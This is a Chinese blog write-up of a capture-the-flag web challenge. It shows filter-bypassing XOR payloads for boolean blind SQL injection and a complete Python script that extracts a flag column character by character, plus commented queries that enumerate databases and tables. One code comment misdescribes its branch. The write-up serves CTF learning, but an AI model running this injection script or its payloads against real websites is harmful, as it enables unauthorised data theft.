[CISCN2019 华北赛区 Day2 Web1]Hack World1

怪兽不会rap_哥哥我会crash

于 2023-11-07 15:30:02 发布

阅读量238

点赞数

分类专栏： BUUCTF web题文章标签：数据库 mysql sql ctf

本文链接：https://blog.csdn.net/whale_waves/article/details/134266939

版权

BUUCTF web题专栏收录该内容

41 篇文章 1 订阅

订阅专栏

提示

基于布尔的盲注
使用python脚本跑

这里已经提示flag在flag表在flag字段

首先输入1 2都能有回显

每当这个时候第一想到的都应该是基于布尔的盲注是否能使用

尝试fuzz

通过fuzz大概知道后续思路

应为过滤的比较全面所以放弃联合查询报错查询预设置
使用基于布尔的盲注

这里首先测试是否能使用基于布尔的盲注

1^1^1=1 1^0^1=0，就像是真真真等于真，真假真等于假（后续我们需要利用这一点）

payload: 1^1^1

payload: 1^0^1

可行

这里使用python编写脚本（应为已经告诉了flag在flag表flag字段里所以直接跳过查表查字段）

应为禁用了空格所以用（）代替

import requests as re

# 设置需要sql注入的网站
url = 'http://829f8090-4b37-44d3-bd7c-84540e34523d.node4.buuoj.cn:81/index.php'

# 提前做好接受flag的变量
flag = ''

# 循环函数
for i in range(1, 1000):
    print(f'{i}:\n')
    # 这里设置最大值和最小值使用二分化的方法跑效率比一般的快超级多
    high = 128
    low = 30
    # 这里设置循环函数，如果最大值小于最小值那么退出
    while low <= high:
        mid = (low + high)//2
        # 爆库名
        # sql1 = f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))={mid})^1'
        # sql2 = f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})^1'
        # sql3 = f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))<{mid})^1'
        # 爆表名
        # sql1 = f'1^(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(table_schema=database())),{i},1))={mid})^1'
        # sql2 = f'1^(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(table_schema=database())),{i},1))>{mid})^1'
        # sql3 = f'1^(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(table_schema=database())),{i},1))<{mid})^1'
        # 爆字段名
        sql1 = f'1^(ascii(substr((select(flag)from(flag)),{i},1))={mid})^1'
        sql2 = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})^1'
        sql3 = f'1^(ascii(substr((select(flag)from(flag)),{i},1))<{mid})^1'

        # 设置id值
        data1 = {
            'id': sql1
        }
        data2 = {
            'id': sql2
        }
        data3 = {
            'id': sql3
        }

        # 通过post传入参数然后给r1 r2 r3
        r1 = re.post(url=url, data=data1)
        r2 = re.post(url=url, data=data2)
        r3 = re.post(url=url, data=data3)

        # Hello出现在页面时说明是对的，输出flag
        if 'Hello' in r1.text:
            flag += chr(mid)
            print(flag)
            break
        # Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值，所以缩小范围到中间值到最大值，一步一步缩小找到flag
        if 'Hello' in r2.text:
            low = mid + 1
        # Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值，所以缩小范围到中间值到最大值，一步一步缩小找到flag
        if 'Hello' in r3.text:
            high = mid - 1
    continue

print(flag)

得到flag

注意当网速不好的时候可能会出现一下情况，多跑几次就行

怪兽不会rap_哥哥我会crash

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
[CISCN2019 华北赛区 Day2 Web1]Hack World1

Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值，所以缩小范围到中间值到最大值，一步一步缩小找到flag。# Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值，所以缩小范围到中间值到最大值，一步一步缩小找到flag。这里使用python编写脚本（应为已经告诉了flag在flag表flag字段里所以直接跳过查表查字段）1^1^1=1 1^0^1=0，就像是真真真等于真，真假真等于假（后续我们需要利用这一点）# 提前做好接受flag的变量。
复制链接

扫一扫